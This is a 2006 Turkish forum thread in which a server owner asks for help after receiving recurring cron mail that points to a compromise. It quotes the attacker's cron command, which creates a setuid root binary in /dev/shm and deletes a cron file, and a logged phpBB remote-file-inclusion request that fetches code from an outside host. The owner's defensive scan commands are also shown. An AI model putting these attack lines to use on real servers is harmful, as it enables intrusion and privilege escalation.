Benim Sorunum Şu Bana Serverımdan Her Dakika
“Cron Daemon Mailadres: root@xxx.alanadım.org” adresinden
“Cron <root@php> chown root:root /dev/shm/r00t && chmod 4755 /dev/shm/r00t && rm -rf /etc/cron.d/core && kill -USR1 21944”
konusu ile
/bin/sh: line 0: kill: (21944) - No such process
İçerikli mail geliyor
Muhtemelen Exploit gibi aklıma geliyor.
Sunucunun Bulunduğu Firmadan
---------------
NOTES: Cease & Desist the attempted upload of malicious code for a known PHPBB vulnerability. Work through the Exploit Removal
Instructions located below my signature block.
Date & Time: 2006-12-11 17:24:48 -0500 GMT (EST) Blocked IP: 72.36.206.74 User Agent: libwww-perl/5.805 Request URI: /forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?
--------------------------
Şeklinde Mail Aldım
Bende
chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-
ve
sh
for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web | htdocs " | grep -E "^$|^/|/$|\\*$|\\.pl$" | grep -Ev "sess_" | tee exploits.txt; done; echo -e "\\n\\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
exit
Işlemlerini Yaptım Ama Hala Sorun Çözülmedi
Sunucuya
clamav-0.88.7 ve rkhunter-1.2.8 kurdum
Yardımlarınız Için Şimdiden Sonsuz Teşekürler…
Sunucumdan Cron Daemon adında Herdakika Mail Geliyor??
13
●4.712
- 17-12-2006, 01:57:31crontab -e
yazınca bunlar çıktı
3 2 * * * /scripts/upcp
0 1 * * * /scripts/cpbackup
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
26 21 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
37 15 * * * cd /usr/local/cpanel/whostmgr/docroot/cgi/fantastico/scripts/ ; /usr/local/cpanel/3rdparty/bin/php cron.php > /dev/null 2>&1
0 6 * * * /scripts/exim_tidydb > /dev/null 2>&1
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1
x - 17-12-2006, 02:10:23hocam sen birşey kurmuşsun yada mod_sec.. falan
/forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?
eleman böyle birşey yapınca onu banlıyor çinli sanırım pek önemli birşey değil ama bu güvenlik sistemi gibi bişi
ancak shm ye r00t ne anlamadım onu - 18-12-2006, 08:06:40başına bela oldu desene 8) ne yapsak sana ya görmeden aklıma bişi gelmiyor ama söyle yap bakalım önce df yazıp çıktıyı buraya yaz hoca sen şu shm ney çözelim swap içine nası r00t var anlamadım birde etc/cron.d/core ve etc/cron.d buralarda neler var bir bak belki crontab -e olarak kayıtlı değildir zamanlanmış görev
